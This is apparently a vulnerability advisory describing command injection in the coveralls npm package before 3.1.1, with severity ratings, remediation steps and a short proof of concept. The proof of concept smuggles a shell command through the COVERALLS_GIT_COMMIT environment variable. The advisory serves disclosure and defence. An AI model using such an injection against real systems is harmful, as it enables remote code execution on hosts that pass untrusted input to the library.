Command Injection Vulnerability In Coveralls: CX-2021-4801

Severity

Severity: 9.3 - Critical Severity

Advisory Timeline Summary
Affected versions of the coveralls npm package are vulnerable to command injection attack via unsafe exec usage in fetchGitData.js.

Product

Coveralls before 3.1.1.

Impact

This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps To Reproduce

poc.js :

process.env.COVERALLS_GIT_COMMIT = "; touch HACKED;"
 
var coveralls = require("coveralls")
coveralls.getBaseOptions((a, b) => {});

Expected Result:

A file named HACKED will be created.

Remediation

  1. Avoid passing untrusted input into the vulnerable parameters when using the library.
  2. Update coveralls to version 3.1.1.

Properties

Attack Vector: Local

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Changed

Confidentiality: High

Integrity: High

Availability: High

Credit

This issue was discovered and reported by Chcekmarx SCA Security Analyst Adar Zandberg.

Resources

  1. Commit 565da5f